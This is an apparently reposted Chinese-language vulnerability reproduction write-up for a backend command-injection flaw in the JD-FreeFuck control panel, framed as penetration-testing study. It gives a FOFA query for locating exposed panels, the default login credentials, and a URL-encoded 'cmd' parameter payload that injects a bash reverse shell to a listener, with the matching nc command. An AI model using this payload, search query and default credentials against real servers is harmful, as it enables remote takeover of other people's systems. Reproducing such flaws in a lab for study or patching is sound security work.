碼上歡樂
相關內容    簡體    繁體

JD-FreeFuck 后台命令執行漏洞

本文轉載自   查看原文   2021-04-14 11:15   504    滲透測試——漏洞復現/ 滲透測試

JD-FreeFuck 后台命令執行漏洞

漏洞說明

JD-FreeFuck 存在后台命令執行漏洞,由於傳參執行命令時沒有對內容過濾,導致可以執行任意命令,控制服務器

項目地址:https://github.com/meselson/JD-FreeFuck

環境搭建

腳本一鍵部署:

bash <(curl -sSL https://gitee.com/mjf521/JD-FreeFuck/raw/main/install.sh)

漏洞復現

FOFA搜索

title="京東薅羊毛控制面板"

訪問后登錄頁面

image-20210413180417572

默認用戶名密碼:

useradmin
supermanito

image-20210413180601261

手動執行腳本---切換換行抓包

![屏幕截圖 2021-04-14 100803](https://tomyyyyy.oss-cn-hangzhou.aliyuncs.com/img/屏幕截圖 2021-04-14 100803.jpg)

然后發送包:

Snipaste_2021-04-14_10-17-58

反彈shell

cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2F192.168.1.101%2F44444+%3C%261'%3B+now

監聽端:

nc -lvvp 44444


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 thinkPHP命令執行漏洞 命令執行漏洞詳解 命令執行漏洞 命令執行漏洞 命令執行漏洞 Git命令執行漏洞 命令執行漏洞 web漏洞之命令執行 任意命令執行漏洞 命令執行及代碼執行漏洞
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM